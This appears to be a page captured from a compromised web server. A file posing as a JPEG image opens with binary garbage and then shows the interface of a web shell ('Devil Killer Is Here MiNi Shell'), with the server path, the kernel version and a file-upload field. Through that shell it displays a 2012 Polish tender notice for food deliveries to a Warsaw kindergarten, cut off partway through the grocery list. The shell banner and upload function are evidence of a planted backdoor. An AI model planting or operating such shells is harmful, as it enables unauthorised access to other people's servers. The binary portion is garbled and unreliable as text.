JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121119/457016-N-2012.html

<p class="kh_header"><b>Warszawa: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH Z PODZIAŁEM NA  6 PAKIETÓW</b><br>
<b>Numer ogłoszenia: 457016 - 2012; data zamieszczenia: 19.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 11 , ul. Dubois 3, 00-184 Warszawa, woj. mazowieckie, tel. 22 831 20 17, faks 22 831 20 17.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www. przedszkolenr11.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH Z PODZIAŁEM NA  6 PAKIETÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH Z PODZIAŁEM NA  6 PAKIETÓW.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.50.00.00-3, 15.30.00.00-1, 03.20.00.00-3, 03.10.00.00-2, 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. 759 z późn. zm.). Ocena spełnienia warunku udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. przedszkolenr11.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PRZEDSZKOLE Nr 11 
00-184 WARSZAWA, UL. ST. DUBOIS 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2012 godzina 10:00, miejsce: PRZEDSZKOLE Nr 11 
00-184 WARSZAWA, UL. ST. DUBOIS 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO I WYROBY CUKIERNICZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CHLEB BALTONOWSKI PSZENNY, krojony, 600-650g	szt.	480
CHLEB WIELOZIARNISTY PSZENNY, krojony, 400-500g	szt.	480
CHLEB RAZOWY NA MIODZIE, 400-500g	szt.	150
CHLEB ORKISZOWY, krojony, 400-500g	szt.	300
CHAŁKA TRADYCYJNA, 300g	szt.	200
BUŁKI MAŚLANE, 50-60g	szt.	600
BUŁKA WROCŁAWSKA PSZENNA, krojona, 300-350g	szt.	500
BUŁKA KAJZERKA PSZENNA, 50g	szt.	2300
BUŁKA TARTA, 500g	szt.	100
BUŁKA RAZOWA Z ZIARNAMI, 50g	szt.	1500
CIASTO DROŻDŻOWE, 300g	szt.	350
DROŻDŻÓWKA, różne smaki: budyń, owocowa, ser, jabłko, 60-80g	szt.	2000
ROGALE TYPU CROISANT, ciasto francuskie do własnego wypieku, różne smaki, 40-70g	szt.	3000
CIABATA, 70-80g	szt.	2000
BUŁKA GRAHAMKA, 60g	szt.	1800
Ciasto pomarańczowe, 	kg	100
Sernik pieczony	kg	150
PĄCZKI SEROWE	kg	40
PĄCZKI  tradycyjne z marmoladą	szt.	500
TOST wieloziarnisty-500gr	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> JOGURT, z bakteriami L-Casei Defensis, 120-150g	szt.	800
JOGURT OWOCOWY, min. 9% owoców w kawałkach, opakowanie plastikowy kubek, 125-150g	szt.	600
MASŁO EXTRA, o zawartości tłuszczu 82%, bez dodatku tłuszczów roślinnych, 200 g	szt.	700
MASŁO ŚMIETANKOWE opakowanie min. 200g, min. 73% tłuszczu	szt.	600
MLEKO SPOŻYWCZE 3,2%, pasteryzowane, homogenizowane, opakowanie w folii 1000ml 	litr	4000
JOGURT NATURALNY, 400g 	szt.	1000
SER ŻÓŁTY ŁAGODNY, zawartość tłuszczu 45%, min. 90% sera, opakowanie 1000-1500g	kg	110
ŚMIETANKA 36%, do ciast i deserów, opakowanie karton 500ml, składnik dodatkowy: stabilizator-karagen	szt.	80
TWARÓG PÓŁTŁUSTY, klasa 1, opakowanie folia o pojemności 250g, zawartość tłuszczu 3,5%	kg	500
SEREK TWAROGOWY TYPU ALMETTE, wartość odżywcza w 100g produktu min. 240 kcal, opakowanie 150g	szt.	300
DESER MLECZNY TYPU MONTE ZOTT, z czekoladą i orzechami, zawartość orzechów laskowych min. 0,6% i mleka min. 45%, opakowanie 100-125g	szt.	4000
SEREK HOMOGENIZOWANY, ziarnisty, 500g	szt.	150
ŚMIETANA 18%, do zup i sałatek, opakowanie 400ml 	szt.	450
NAPÓJ MLECZNY TYPU ACTIMEL- OP.100GR	szt.	5000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> RYBY I MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MROŻONKA BROKUŁY, różyczki, opakowanie 2000-2500g	kg	100
MROŻONKA KALAFIOR, opakowanie 2000-2500 g	kg	100
MROŻONKA MARCHEWKA MINI, opakowanie 2000-2500g	kg	80
MROŻONKA CZARNA PORZECZKA, opakowanie 2000-2500g	kg	150
MROŻONKA CZERWONA PORZECZKA, opakowanie 2000-2500 g	kg	150
MROŻONKA FASOLKA SZPARAGOWA ŻÓŁTA, opakowanie 2000-2500 g	kg	70
MROŻONKA JAGODA, opakowanie 2000-2500g	kg	50
MROŻONKA SZPINAK, opakowanie 2000-2500 g	kg	50
MROŻONKA TRUSKAWKA, bez szypułek, opakowanie 2000-2500 g	kg	180
MROŻONKA MALINA, opakowanie 2000-2500g	kg	80
FILET Z PSTRĄGA, świeży, wypatroszony, tuszki około 500g	kg	60
FILET Z DORSZA, świeży, wypatroszony	kg	50
FILET Z ŁOSOSIA, ŚWIEZY, WYPATROSZONY, TUSZKI około 1kg	kg	100
ŁOSOŚ WĘDZONY NA ZIMNO, plastrowany, zapakowany próżniowo na tacce, minimalny termin przydatności do spożycia - 10 dni od daty dostawy	  kg	50
KONSERWA TUŃCZYK W OLEJU, duże kawałki, puszka 170-180g, masa ryby min. 70%	  szt	300
MROŻONKA WISNIA BEZ PESTEK	KG	60
Mrożonka groszek zielony, opakowanie 2000gr	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WARZYWA I OWOCE ŚWIEŻE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ARBUZ, klasa I lub II wg Rozporządzenie Komisji (WE) nr 1093/97 dostawy, (czerwiec-październik)	kg	250
BANANY, klasa I lub II, wg Rozporządzenie Komisji (WE) NR 2257/94, (listopad-marzec)	kg	700
BANANY, klasa I lub II, wg Rozporządzenie Komisji (WE) NR 2257/94, (kwiecień-październik)	kg	800
BOTWINA, w pęczkach 400-500g, (kwiecień-wrzesień)	szt.	30
BROKUŁY, różyczki zwarte, barwa intensywna zielona, min. 400g	szt.	150
BRZOSKWINIE, (czerwiec-październik)	kg	180
BURAKI CZERWONE, konsumpcyjne, wielkość średnia	kg	400
CEBULA BIAŁA, wielkość średnia	kg	300
CYKORIA BIAŁA	kg	30
CYTRYNY	kg	250
DYNIA	kg	100
FASOLKA SZPARAGOWA ŻÓŁTA, bez łyka, (maj-październik)	kg	80
GRUSZKI, krajowe, typu konferencja, klapsa	kg	600
JABŁKA, typu cortland, ligol champion, delikates, rubin, jonagored, średnia wielkość, bez korka	kg	2000
KALAFIOR, różyczki białe, zwarte, min. 700g	szt.	150
KAPUSTA BIAŁA, główka 2000-3000g  	kg	350
KAPUSTA CZERWONA, główka 2000-2500g	kg	100
KAPUSTA KISZONA, nie przekwaszona, opakowanie wiaderko plastikowe 5000g	kg	200
KAPUSTA PEKIŃSKA, główka 1000-1500g	kg	120
KAPUSTA WŁOSKA, główka 1800-2200g	kg	20
KIWI, gramatura sztuki 10-15g, dostarczane na palecie	szt.	2000
KOPEREK ZIELONY, pęczek 
o wadze sezonowej	szt.	150
MANDARYNKI, bezpestkowe, (listopad-marzec)	kg	200
MANDARYNKI, bezpestkowe, (kwiecień-październik)	kg	0
MARCHEW KAROTKA, wielkość średnia	kg	1600
NATKA PIETRUSZKI, pęczki 
o wadze sezonowej	szt.	200
NEKTARYNKI, wielkość średnia, (maj-październik)	kg	150
OGÓRKI KISZONE, nie przekwaszone, opakowanie wiaderko plastikowe 5000-6000g	kg	270
OGÓRKI ŚWIEŻE, szklarniowe lub gruntowe - w zależności od sezonu, twarde	kg	270
PAPRYKA CZERWONA (listopad-marzec)	kg	70
PAPRYKA CZERWONA (kwiecień-październik)	kg	30
PIETRUSZKA, zdrowy korzeń, twarda, wielkość średnia, umyta	kg	300
POMARAŃCZE TYPU NOWELINA, cienka skórka, (listopad-marzec)	kg	200
POMARAŃCZE TYPU NOWELINA, cienka skórka, (kwiecień-październik)	kg	80
POMIDORY CZERWONE (listopad-marzec)	kg	150
POMIDORY CZERWONE (kwiecień-październik)	kg	100
POR	kg	170
RZODKIEW BIAŁA, wielkość średnia	kg	20
RZODKIEWKA, młoda, okrągła, pęczki 100-120g	szt. 	200
SELER, biały, umyty, wielkość średnia	kg	300
SZCZAW, liście sprężyste, (maj-sierpień)	kg	20
DYMKA ZE SZCZYPIOREM, pęczki wielkość sezonowa	szt.	60
SZCZYPIOREK, cienki, pęczki wielkość sezonowa	szt.	150
ŚLIWKI TYPU WĘGIERKA, dojrzałość konsumpcyjna, krajowa, (sierpień-październik)	kg	50
TRUSKAWKA, krajowa, odmiana konsumpcyjna, w całości wybarwiona, dostawa w łubiankach, (kwiecień-wrzesień)	kg	100
MALINY, suche, opakowanie 350-400g, (czerwiec-wrzesień)	szt.	150
WINOGRONA CIEMNE/JASNE, kiście zagraniczne, (listopad-marzec) 	kg	130
WINOGRONA CIEMNE/JASNE, kiście zagraniczne,  (kwiecień-październik) 	kg	100
ZIEMNIAKI, typu Irga, konsumpcyjne, umyte, skórka bez zielonych zabarwień, bez kiełkujących oczek,   wielkość średnia, dostawy od września 2012 
z produkcji 2012 roku	kg	3500
ZIEMNIAKI MŁODE, średniej wielkości, (maj-wrzesień)	kg	300
Kaki, świeże, średniej wielkości, 
bez cech zepsucia	szt.	300
Czosnek polski, średniej wielkości	szt.	80
JAJA KURZE KONSUMPCYJNE, klasa L - 63-73g, z wolnego wybiegu, dezynfekowane za pomocą promieniowania ultrafioletowego	szt.	7000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MIĘSO I WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> INDYK FILET Z PIERSI, przedział wagowy 1000-1500g, świeży, bez skóry, bez kości, nie rozmrażany	kg	110
KURCZAK ŚWIEŻY, cały, patroszony, przedział wagowy 1500-2000g, nie rozmrażany	kg	200
ŁOPATKA WIEPRZOWA, bez skóry, bez kości, bez wierzchniej warstwy tłuszczu, świeża, nie rozmrażana, kawałki 1000-1500g	kg	200
MIĘSO WIEPRZOWE Z SZYNKI, bez kości, bez tłuszczu, kawałki 1000-1500g oraz kulki, świeże, nie rozmrażane	kg	80
KURCZAK FILET Z PIERSI, świeże, nie rozmrażane, bez skóry, bez chrząstki, pojedyncze w przedziale wagowym 300-400g	kg	110
KURCZAK PODUDZIE, pałeczka 100-130g, świeże, nie rozmrażane	kg	150
SCHAB, środkowy bez kości, o średnicy nie większej niż 10cm, świeży, nie rozmrażany, kawałek 1500-2000g	kg	150
SŁONINA, surowa, bez dodatków,  bez skóry, grubość  2 - 4cm, świeża, nie rozmrażana	kg	10
SZPONDER WOŁOWY, chudy, surowy, barwa tłuszczu - biała, paski długości do 40cm, szerokość do 12cm, świeży, nie rozmrażany	kg	70
CIELĘCINA ZADNIA, bez kości, kawałki min. 500g, świeża, nie rozmrażana	kg	50
ŁOPATKA WOŁOWA, bez kości, świeża, nie rozmrażana	kg	60
WOŁOWE PRĘGA, bez kości, świeże, nie rozmrażane, z młodych sztuk	kg	100
WOŁOWE Z UDŹCA, bez kości, świeże, nie rozmrażane, z młodych sztuk 1000-1500g	kg	100
KIEŁBASA SZYNKOWA, średnio rozdrobniona, zawartość mięsa wieprzowego min. 85%    	kg	15
POLĘDWICA SOPOCKA, wysoko wydajna, mięso wieprzowe min. 67% 	kg	80
KIEŁBASA KRAKOWSKA PODSUSZANA PARZONA, grubo rozdrobniona, wysoko wydajna, mięso wieprzowe min. 70%	kg	20
KABANOSY WIEPRZOWE, obsuszane	kg	60
KIEŁBASA CIENKA TYPU PODWAWELSKA/TORUŃSKA, mięso wieprzowe min. 84%	kg	40
MIELONKA KONSERWOWA, mięso wieprzowe min. 72%	kg	35
SALAMI TYPU PIASTOWSKIE, mięso wieprzowe 64%, mięso wołowe 32%	kg	50
SZYNKA GOTOWANA WIEPRZOWA, mięso wieprzowe min. 67%	kg	80
FILET Z INDYKA PIECZONY, produkt blokowy grubo rozdrobniony, mięso z indyka min. 72  %, mięso wieprzowe min. 4,5%	kg	30
BOCZEK WĘDZONY PARZONY	kg	40
POLĘDWICA DROBIOWA, wędzonka drobiowa wysoko wydajna, mięso z indyka min. 68%	kg	10
ŻEBERKA  świeże	kg	15
KIEŁBASA ŻYWIECKA PODSUSZONA, min. 70% mięsa wieprzowego	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ARTYKUŁY OGÓLNOSPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BAZYLIA SUSZONA, opakowanie 10-15g	szt.	50
BUDYŃ WANILIOWY Z CUKREM, wydajność z opakowania 500ml, opakowanie 60-70g	szt.	170
CUKIER BIAŁY, drobny kryształ, opakowanie 1000g	kg	800
CUKIER WANILIOWY, opakowanie 16-20g	szt.	400
CUKIER PUDER, opakowanie 250-300g	szt.	100
DROŻDŻE ŚWIEŻE, opakowanie 100g	szt.	40
DŻEM NISKOSŁODZONY, różne smaki: truskawkowy, morelowy, brzoskwiniowy, wsad owocowy min. 35g owoców w 100g produktu, opakowanie słoik 300-320g	szt.	130
FASOLA BIAŁA, sucha, drobna, opakowanie 400g	kg	35
GROCH ŁUSKANY, połówki, opakowanie 400g	kg	35
HERBATA EKSPRESOWA CZARNA 100%, WYSOKOGATUNKOWA, TYPU EL GRAY, opakowanie 100 saszetek	szt.	60
HERBATA ZIOŁOWA MIĘTA EKSPRESOWA, opakowanie 20-25 torebek	szt.	80
HERBATA OWOCOWA EKSPRESOWA, różne smaki, opakowanie 20-25 torebek	szt.	130
KAWA ROZPUSZCZALNA ZBOŻOWA TYPU INKA, opakowanie 150-180g	szt.	40
KAKAO NATURALNE, extra ciemne, opakowanie 100g	szt.	80
KASZA GRYCZANA, prażona cała, opakowanie 900-1000g	szt.	50
KASZA JĘCZMIENNA, perłowa, biała, łamana średnia, opakowanie 1000g	kg	60
KASZA MANNA, op 1000g	kg	30
KASZA KUSKUS, opakowanie 900-1000g	szt.	80
